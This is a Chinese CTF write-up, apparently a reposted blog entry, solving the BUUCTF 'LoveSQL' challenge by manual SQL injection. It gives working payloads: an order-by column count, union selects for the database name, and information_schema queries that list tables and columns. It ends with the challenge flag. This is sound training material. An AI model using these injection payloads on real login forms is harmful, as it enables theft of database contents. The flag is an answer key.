当前位置: 首页 > article >正文

buuctf-[极客大挑战 2019]LoveSQL

article 2025/2/25 3:59:25

进入环境,观察一下怎么进行sql注入

发现是登录框形式的,那么试一下万能密码登录

我们用提示给的密码登录试一下

还是一样的提示,用sqlmap试了一下没有效果,那即手工爆

我们爆破字段数

输入username=admin%27%20order%20by%204%23&password=1,直接在网址上输入这个

发现字段数为4

那么我们继续爆破表名

username=1' union select 1,database(),version()%23&password=1

得到了库名,下面爆破表名

username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

发现了表名为l0ve1ysq1,下面得到这个表里的内容

username=1&password='union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = ‘geek’%23

查看源代码就看到了flag

flag{7008a66a-f141-446e-b3e5-71c1c16a2827}


http://www.kler.cn/a/559822.html

相关文章:

  • 调试无痛入手
  • 蓝桥杯试题:小明的彩灯(差分 前缀和)
  • Linux系统移植之Uboot启动流程
  • “国补”带火手机换新,出售旧手机应如何保护个人信息安全
  • 鸿蒙学习-
  • Http升级为Https - 开发/测试服环境
  • 基于物联网的家庭版防疫面罩设计与实现(论文+源码)
  • μEMU部署测试(论文复现)
  • 整理好的java面试八大常用算法
  • 宠物智能可穿戴产品调研报告
  • QT开发:事件循环与处理机制的概念和流程概括性总结
  • 详解Tomcat下载安装以及IDEA配置Tomcat(2023最新)
  • Spring Boot中如何使用Thymeleaf模板引擎
  • npm使用了代理,但是代理软件已经关闭导致创建失败
  • 使用 AIStor 和 OpenSearch 增强搜索功能
  • 基于Spring Boot的公司资产网站设计与实现(LW+源码+讲解)
  • 高清下载油管视频到本地
  • 【MySQL篇】数据库基础
  • C++访问MySQL数据库
  • 百度首页上线 DeepSeek 入口,免费使用